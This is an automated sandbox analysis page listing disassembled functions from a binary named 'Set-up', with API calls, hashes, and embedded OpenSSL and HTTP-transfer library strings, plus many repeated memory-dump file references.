Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID:
String ID: .%lu$crypto/objects/obj_dat.c
API String ID: 0-3322715555
Opcode ID: 4cde179bcb7e066aa5bbe8abd7cd91adbe36d6fabd661112c8c7399de224f969
Instruction ID: 8a7d4b86e92102e1d0538e4aaf702e92a87b63dffe2adc4ab213779b17083135
Opcode Fuzzy Hash: 4cde179bcb7e066aa5bbe8abd7cd91adbe36d6fabd661112c8c7399de224f969
Instruction Fuzzy Hash: 39A1F873A08301DBDB109E15884972BB7E6AFD0704F18862DEC89973C3EB79DC06D696

Function 00540080 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 301stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00540090

Part of subcall function 005FF340: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,005400B0,?,?,00000000,00000000,?), ref: 005FF35D

Strings

Offset (%lld) was beyond file size (%lld), xrefs: 00544CF5, 00544D0E, 00544D64
Bad file size (%lld), xrefs: 00544CFF
$, xrefs: 00544D75
File already completely downloaded, xrefs: 00544239

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _time64strlen
String ID: $$Bad file size (%lld)$File already completely downloaded$Offset (%lld) was beyond file size (%lld)
API String ID: 3014104814-979756411
Opcode ID: 60f74e8813188acbf0a06b94401699011d448f406e6b3bbaa2c707722b3631e8
Instruction ID: d36896f60cd204f9d3246e6d58a30e178a580fcdfc83f6cf3118674f606ace3f
Opcode Fuzzy Hash: 60f74e8813188acbf0a06b94401699011d448f406e6b3bbaa2c707722b3631e8
Instruction Fuzzy Hash: EEB1F471A043419FD714DF28C884BAABBE5BFC9318F184A2DF994973A2D770AC448B52

Function 0052E300 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 283COMMON

Download Yara Rule

Strings

cannot mix POSTFIELDS with RESUME_FROM, xrefs: 0052E3C1
transfer.c, xrefs: 0052E331, 0052E364, 0052E479, 0052E59A, 0052E5E4, 0052E70D, 0052E729
No URL set, xrefs: 0052E393
User-Agent: %s, xrefs: 0052E60C

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID:
String ID: No URL set$User-Agent: %s$cannot mix POSTFIELDS with RESUME_FROM$transfer.c
API String ID: 0-950935550
Opcode ID: 267712087dfb36fdf1d17e5cc5f9cde4b657595c97232bc8e9dde341e3b9784a
Instruction ID: 41575423822823cdc6fc070212a310bc7cf6772b52857e2137cda12262178dd8
Opcode Fuzzy Hash: 267712087dfb36fdf1d17e5cc5f9cde4b657595c97232bc8e9dde341e3b9784a
Instruction Fuzzy Hash: D7B1C5B1B00A136BE7199B74EC46BA6FFA4BF56315F080229E91C922C1E7717464CBD2

Function 0066A210 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 152stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0066A37F

Strings

ossl_quic_channel_raise_protocol_error_loc, xrefs: 0066A2D9, 0066A3B0
ssl/quic/quic_channel.c, xrefs: 0066A2E3, 0066A3BA
QUIC error code: 0x%llx%s%s%s (triggered by frame type: 0x%llx%s%s%s), reason: "%s", xrefs: 0066A310
QUIC error code: 0x%llx%s%s%s, reason: "%s", xrefs: 0066A3D5

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: strlen
String ID: QUIC error code: 0x%llx%s%s%s (triggered by frame type: 0x%llx%s%s%s), reason: "%s"$QUIC error code: 0x%llx%s%s%s, reason: "%s"$ossl_quic_channel_raise_protocol_error_loc$ssl/quic/quic_channel.c
API String ID: 39653677-1084217658
Opcode ID: 53d6c60ed0bf3082aafcce32640b22d9d23be201321b45a0f0b5b70ed7727d66
Instruction ID: 3daec95193396325369e344dd2c96f395b172d6e107ea743cddeef2ff1d76bce
Opcode Fuzzy Hash: 53d6c60ed0bf3082aafcce32640b22d9d23be201321b45a0f0b5b70ed7727d66
Instruction Fuzzy Hash: 8451AFB1A04345ABCF00DF64D842E9B7BEAEF98314F04496CFE48E7301E631D9548BA2

Function 00896250 Relevance: 7.7, APIs: 5, Instructions: 151COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,005E0E3B,?,?,00000000,?), ref: 008963E9
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,005E0E3B,?,?,00000000,?), ref: 008963FB

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: 6e7aa1fa2f5c2d9a19cacb472979bf5df24242fd24ea0d786e78c8c0ceda238f
Instruction ID: 7e7c777cf0602e2083cf180e4e2700c31bae23baa6a515290c1885f6f5fb5d05
Opcode Fuzzy Hash: 6e7aa1fa2f5c2d9a19cacb472979bf5df24242fd24ea0d786e78c8c0ceda238f
Instruction Fuzzy Hash: B6419E71A082159BEF04BF699880B2B77E9FB94758F1D4438E84AC7341F674EC249692

Function 006C67F0 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 117stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 006C691C

Strings

reason(%lu), xrefs: 006C68E1
err:%lx:%lx:%lx:%lx, xrefs: 006C6933
error:%08lX:%s:%s:%s, xrefs: 006C68FE
lib(%lu), xrefs: 006C689A

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: strlen
String ID: err:%lx:%lx:%lx:%lx$error:%08lX:%s:%s:%s$lib(%lu)$reason(%lu)
API String ID: 39653677-804487489
Opcode ID: d63ece2db93a4f5d98ed9ff4f5ad06194d3b80b4f1557b20d0f4416ad2bc596e
Instruction ID: 47e819acfb565599abf476f5225397b6667973ddf4160b956ff54c50c7dba3df
Opcode Fuzzy Hash: d63ece2db93a4f5d98ed9ff4f5ad06194d3b80b4f1557b20d0f4416ad2bc596e
Instruction Fuzzy Hash: 543124B2A043006BFB206A15DC46FFB769EEB90314F04003CFD5892292E776AD14C6BA

Function 0085A340 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 106stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,0085ABB9), ref: 0085A34E

Part of subcall function 006EE270: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(crypto/mem_sec.c,00000187,assertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0,crypto/mem_sec.c,00000185,assertion failed: list >= 0 && list < sh.freelist_size,crypto/mem_sec.c,00000184,-00000001), ref: 006EE28D

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,0085ABB9), ref: 0085A446

Strings

.cnf, xrefs: 0085A38E
crypto/conf/conf_def.c, xrefs: 0085A3B9, 0085A410
.conf, xrefs: 0085A376

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: strlen$_errno
String ID: .cnf$.conf$crypto/conf/conf_def.c
API String ID: 3066963124-3060939390
Opcode ID: 2340fe4bae0a04bab30d3898203c6dcc47365a85019880d3c8ac10cfc075148f
Instruction ID: be9a7551e2ea7ea1f8a98cea27472f1e63074db46f51b9dc7c1f9d75903ca835
Opcode Fuzzy Hash: 2340fe4bae0a04bab30d3898203c6dcc47365a85019880d3c8ac10cfc075148f
Instruction Fuzzy Hash: B521F7A2D0134667DB103675ACC2E5B76CCEF5135AF080939FC45D6382FA66DE0881A7

Function 006A0870 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00000000,00000000,00000000,00000100,?,006EF556,00000000,FFFFFFFF,00000000,?,00000000,006F06DF,?), ref: 006A08D7
memset.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,?,00000000,0066973B), ref: 006A0977

Part of subcall function 006C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C7262
Part of subcall function 006C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C7285
Part of subcall function 006C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C72C5
Part of subcall function 006C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C72E8

Strings

crypto/buffer/buffer.c, xrefs: 006A08A1, 006A08FC, 006A0911, 006A0946
BUF_MEM_grow, xrefs: 006A089A

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: memsetstrcpystrlen
String ID: BUF_MEM_grow$crypto/buffer/buffer.c
API String ID: 1298912638-2735992530
Opcode ID: 0becd5f9b4e24b800d92aedbaf1d84b25dc08aa19fe1d88091c1f66352754a26
Instruction ID: 11519ed58a03a8d941761d216e857c1ebdbff6358358434ea380bd54f009c2a1
Opcode Fuzzy Hash: 0becd5f9b4e24b800d92aedbaf1d84b25dc08aa19fe1d88091c1f66352754a26
Instruction Fuzzy Hash: BB314C71A443027BF710BA259C02F6BB79AEB42724F188568F81C973C3E765EC198BD5

Function 008966C0 Relevance: 7.6, APIs: 5, Instructions: 100stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00897850: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,008966E9,?,?,?,?,?,?,?,?,?,?,?), ref: 0089787B

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,UTF-8,00000001,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 008966F5
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00C211AC,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00896714
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00896727
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00896776
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008967CC

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _errno$strcmp
String ID:
API String ID: 3909137471-0
Opcode ID: c9f3b9f49874aeae6d8ff69693c5b4b46fa41d5792e126c59f85d6a8eabf8728
Instruction ID: 60b9d04ab4a15489c4c23fef059659f1f429f6e726e7ceacfb1c0eff504bd9a1
Opcode Fuzzy Hash: c9f3b9f49874aeae6d8ff69693c5b4b46fa41d5792e126c59f85d6a8eabf8728
Instruction Fuzzy Hash: 7531A035600202AFDF11BFA8EC44A1A77E9FF5A368F494628F958D7211F731DD218B52

Function 006F2010 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,006F2704,00000008), ref: 006F204D

Part of subcall function 006C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C7262
Part of subcall function 006C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C7285
Part of subcall function 006C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C72C5
Part of subcall function 006C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C72E8

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,006F2704,00000008), ref: 006F20C3

Strings

general_set_int, xrefs: 006F2086
copy_integer, xrefs: 006F20DA
crypto/params.c, xrefs: 006F2090, 006F20E4

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: strcpystrlen$memcpymemset
String ID: copy_integer$crypto/params.c$general_set_int
API String ID: 2323844366-2562949257
Opcode ID: 367349b6c20b0ca724441a7c9271552ad6438a8afd0d5071c2d03053b58a3c1a
Instruction ID: eaf2e302211aadfb4cc90a8040a9046e9a675d5c2f12ae78f71d837e0b9a648e
Opcode Fuzzy Hash: 367349b6c20b0ca724441a7c9271552ad6438a8afd0d5071c2d03053b58a3c1a
Instruction Fuzzy Hash: B7213D71A0830A6BD23066289CA6F777797DB45714F18007DFB0CC7383ED56AC55CAA5

Function 006F2140 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,006F299E,00000008), ref: 006F21A8
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,006F299E,00000008), ref: 006F21FE

Part of subcall function 006F40A0: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,006F2075,?,?,?,?,?,?,006F2704,00000008), ref: 006F40C1
Part of subcall function 006F40A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,006F2075,?,?,?,?,?,?,006F2704,00000008), ref: 006F411E

Strings

copy_integer, xrefs: 006F2214
general_get_uint, xrefs: 006F2176, 006F21BA
crypto/params.c, xrefs: 006F2180, 006F21C4, 006F221E

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: memcpymemset
String ID: copy_integer$crypto/params.c$general_get_uint
API String ID: 1297977491-1187682564
Opcode ID: 01361db483d80eef3788afd9ac345d4f5a74efd9cdf3fdcebd7a64690d5abe1d
Instruction ID: 9fdeead67cfbe8da7215d1fcb6002582a65bc63635bd0236b20e0190539d1916
Opcode Fuzzy Hash: 01361db483d80eef3788afd9ac345d4f5a74efd9cdf3fdcebd7a64690d5abe1d
Instruction Fuzzy Hash: C8215776B442067BD5307168AC17F7F6747CBC5B24F2C006DFB0CAA2C3E999A80149A9

Function 006F2240 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,?,006F2BF4,00000008), ref: 006F22C1
